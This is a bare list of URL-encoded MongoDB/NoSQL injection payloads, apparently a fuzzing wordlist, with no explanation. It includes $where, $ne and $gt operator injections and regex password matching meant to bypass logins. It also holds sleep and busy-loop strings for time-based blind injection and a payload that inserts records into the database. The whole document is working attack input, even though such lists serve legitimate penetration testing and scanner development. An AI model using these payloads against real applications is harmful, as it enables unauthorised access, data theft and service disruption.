'%20%26%26%20this.password.match(/.*/)//%2B%00
'%20%26%26%20this.passwordzz.match(/.*/)//%2B%00
'%20}%20],%20$comment:'successful%20MongoDB%20injection'
";return(true);var%20xyz%3D'a
$where:%20'1%20%3D%3D%201'
'%20%26%26%20this.password.match(/.*/)//%2B%00
'%20%26%26%20this.passwordzz.match(/.*/)//%2B%00
',%20$or:%20[%20{},%20{%20'a':'a
,%20$where:%20'1%20%3D%3D%201'
',%20$where:%20'1%20%3D%3D%201'
';it%3Dnew%20Date();do{pt%3Dnew%20Date();}while(pt-it<5000);
';return%20'a'%3D%3D'a'%20%26%26%20''%3D%3D'
';sleep(5000);
';sleep(5000);'
';sleep(5000);%2B'
[$ne]%3D1
{%20$ne:%201%20}
{"$gt":%20""}
{"%26exists":false}
{$gt:%20''}
||%201%3D%3D1
0;return%20true
1,%20$where:%20'1%20%3D%3D%201'
db.injection.insert({success:1});
db.injection.insert({success:1});return%201;db.stores.mapReduce(function()%20{%20{%20emit(1,1
true,%20$where:%20'1%20%3D%3D%201'
